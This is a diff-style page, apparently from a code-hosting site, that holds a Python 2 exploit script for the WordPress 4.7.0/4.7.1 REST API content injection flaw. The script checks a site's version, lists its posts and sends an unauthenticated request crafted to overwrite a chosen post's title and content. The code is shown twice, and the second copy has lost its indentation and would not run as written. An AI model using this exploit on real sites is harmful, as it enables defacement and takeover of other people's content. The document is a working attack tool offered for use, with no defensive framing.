krlabs · August 25, 2022 16:37
diff --git a/wordpress_content_injection.py b/wordpress_content_injection.py
 #! /usr/bin/env python

 """
 Technical Explanation: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
 REST API Wordpress reference: https://developer.wordpress.org/rest-api/reference/posts/#update-a-post
 Wordpress Version Affected: 4.7.0/4.7.1

 2017 - Coded by snoww0lf.
 """
 import re
 import json
 import urllib2

 class WpContent:
 	def __init__(self, url):
 		self.__url = url
 		self.__response = urllib2.urlopen(self.__url).read()

 	def get_api_wp(self):
 		return re.findall(r"https://api.w.org/' href='(.*)'", self.__response)[0]

 	def get_wp_version(self):
 		check_version = re.findall(r'ver=(.*)"', self.__response)[0]
 		if check_version == "4.7" or check_version == "4.7.1":
 			check_version += " ( Maybe vulnerable to inject ) "
 		else:
 			check_version += " ( Maybe not vulnerable to inject ) "
 		return check_version

 	def get_wp_post_information(self):
 		get_post = urllib2.urlopen(self.get_api_wp()+"wp/v2/posts").read()
 		load_info = json.loads(get_post)
 		collected_information = ""
 		for load in load_info:
 			collected_information += "[x] Post ID: {0}\n[x] Post Title: {1}\n[x] Post URL: {2}\n[x] Post Content: {3} [SNIPPET]\n\n".\
 			format(load['id'], load['title']['rendered'].encode("utf-8"), load['link'], load['content']['rendered'][:100].encode('utf-8'))
 		return collected_information

 	def inject_content(self, id_content, title, content):
 		data = json.dumps({
 			'title':title,
 			'content':content
 			})
 		params = {'Content-Type':'application/json'}
 		full_url = self.get_api_wp() + "wp/v2/posts/{0}/?id={0}CBF".format(id_content)
 		req = urllib2.Request(full_url, data, params)
 		resp = urllib2.urlopen(req).read()
 		return resp

 def main():
 	print("[X] WORDPRESS 4.7.0/4.7.1 CONTENT INJECTION EXPLOIT BY snoww0lf [X]\n")
 	while True:
 		url = raw_input("[x] Enter the URL: ")
 		print("[?] Please wait ...\n")
 		wpcontent = WpContent(url)
 		wp_version = wpcontent.get_wp_version().split()[0]
 		print("[x] Wordpress Version: {0} ".format(wp_version))
 		if(wp_version == "4.7" or wp_version == "4.7.1"):
 			select = raw_input("[x] It's affected version. It seems vulnerable, continue? [y/n] ").lower()
 			while(select != "y" and select != "n"):
 				print("[x] Wrong selection! Try again.")
 				select = raw_input("[x] Affected version. Seems vulnerable, continue? [y/n] ").lower()
 			print("\n")
 			if(select == "y"):
 				print("[x] Parsing data information, please wait ...\n")
 				wp_information = wpcontent.get_wp_post_information()
 				print(wp_information)
 				inp_id = input("[x] Enter ID Content that you want to overwrite: ")
 				inp_title = raw_input("[x] Change title: ")
 				print("\n")
 				print("=> 1. Load data from file.")
 				print("=> 2. Input data.")
 				print("\n")
 				mode = input("[x] Change content by [1/2] ? ")
 				if mode == 1:
 					dfile = raw_input("[x] Enter the filename: ")
 					with open(dfile, 'r') as f:
 						readf = f.readlines()
 					print("[x] Exploit in progress ...\n")
 					wpcontent.inject_content(inp_id, inp_title, ''.join(readf))
 				else:
 					inp_data = raw_input("[?] Input data: ")
 					print("[x] Exploit in progress ...\n")
 					wpcontent.inject_content(inp_id, inp_title, inp_data)
 				print("[x] Update success!\n")
 				cont = raw_input("[?] Continue ? [y/n] ").lower()
 				while(cont != "y" and cont != "n"):
 					print("[x] Wrong selection! Try again.")
 					cont = raw_input("[?] Continue ? [y/n] ").lower()
 				if cont == "n": break
 			else:
 				break
 		else:
 			cont = raw_input("[?] Continue ? ").lower()
 			while(cont != "y" and cont != "n"):
 				print("[x] Wrong selection! Try again.")
 				cont = raw_input("[?] Continue ? ").lower()
 			if cont == "n": break

 if __name__ == '__main__':
 	main()
	#! /usr/bin/env python

	"""
	Technical Explanation: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
	REST API Wordpress reference: https://developer.wordpress.org/rest-api/reference/posts/#update-a-post
	Wordpress Version Affected: 4.7.0/4.7.1

	2017 - Coded by snoww0lf.
	"""
	import re
	import json
	import urllib2

	class WpContent:
	def __init__(self, url):
	self.__url = url
	self.__response = urllib2.urlopen(self.__url).read()

	def get_api_wp(self):
	return re.findall(r"https://api.w.org/' href='(.*)'", self.__response)[0]

	def get_wp_version(self):
	check_version = re.findall(r'ver=(.*)"', self.__response)[0]
	if check_version == "4.7" or check_version == "4.7.1":
	check_version += " ( Maybe vulnerable to inject ) "
	else:
	check_version += " ( Maybe not vulnerable to inject ) "
	return check_version

	def get_wp_post_information(self):
	get_post = urllib2.urlopen(self.get_api_wp()+"wp/v2/posts").read()
	load_info = json.loads(get_post)
	collected_information = ""
	for load in load_info:
	collected_information += "[x] Post ID: {0}\n[x] Post Title: {1}\n[x] Post URL: {2}\n[x] Post Content: {3} [SNIPPET]\n\n".\
	format(load['id'], load['title']['rendered'].encode("utf-8"), load['link'], load['content']['rendered'][:100].encode('utf-8'))
	return collected_information

	def inject_content(self, id_content, title, content):
	data = json.dumps({
	'title':title,
	'content':content
	})
	params = {'Content-Type':'application/json'}
	full_url = self.get_api_wp() + "wp/v2/posts/{0}/?id={0}CBF".format(id_content)
	req = urllib2.Request(full_url, data, params)
	resp = urllib2.urlopen(req).read()
	return resp

	def main():
	print("[X] WORDPRESS 4.7.0/4.7.1 CONTENT INJECTION EXPLOIT BY snoww0lf [X]\n")
	while True:
	url = raw_input("[x] Enter the URL: ")
	print("[?] Please wait ...\n")
	wpcontent = WpContent(url)
	wp_version = wpcontent.get_wp_version().split()[0]
	print("[x] Wordpress Version: {0} ".format(wp_version))
	if(wp_version == "4.7" or wp_version == "4.7.1"):
	select = raw_input("[x] It's affected version. It seems vulnerable, continue? [y/n] ").lower()
	while(select != "y" and select != "n"):
	print("[x] Wrong selection! Try again.")
	select = raw_input("[x] Affected version. Seems vulnerable, continue? [y/n] ").lower()
	print("\n")
	if(select == "y"):
	print("[x] Parsing data information, please wait ...\n")
	wp_information = wpcontent.get_wp_post_information()
	print(wp_information)
	inp_id = input("[x] Enter ID Content that you want to overwrite: ")
	inp_title = raw_input("[x] Change title: ")
	print("\n")
	print("=> 1. Load data from file.")
	print("=> 2. Input data.")
	print("\n")
	mode = input("[x] Change content by [1/2] ? ")
	if mode == 1:
	dfile = raw_input("[x] Enter the filename: ")
	with open(dfile, 'r') as f:
	readf = f.readlines()
	print("[x] Exploit in progress ...\n")
	wpcontent.inject_content(inp_id, inp_title, ''.join(readf))
	else:
	inp_data = raw_input("[?] Input data: ")
	print("[x] Exploit in progress ...\n")
	wpcontent.inject_content(inp_id, inp_title, inp_data)
	print("[x] Update success!\n")
	cont = raw_input("[?] Continue ? [y/n] ").lower()
	while(cont != "y" and cont != "n"):
	print("[x] Wrong selection! Try again.")
	cont = raw_input("[?] Continue ? [y/n] ").lower()
	if cont == "n": break
	else:
	break
	else:
	cont = raw_input("[?] Continue ? ").lower()
	while(cont != "y" and cont != "n"):
	print("[x] Wrong selection! Try again.")
	cont = raw_input("[?] Continue ? ").lower()
	if cont == "n": break

	if __name__ == '__main__':
	main()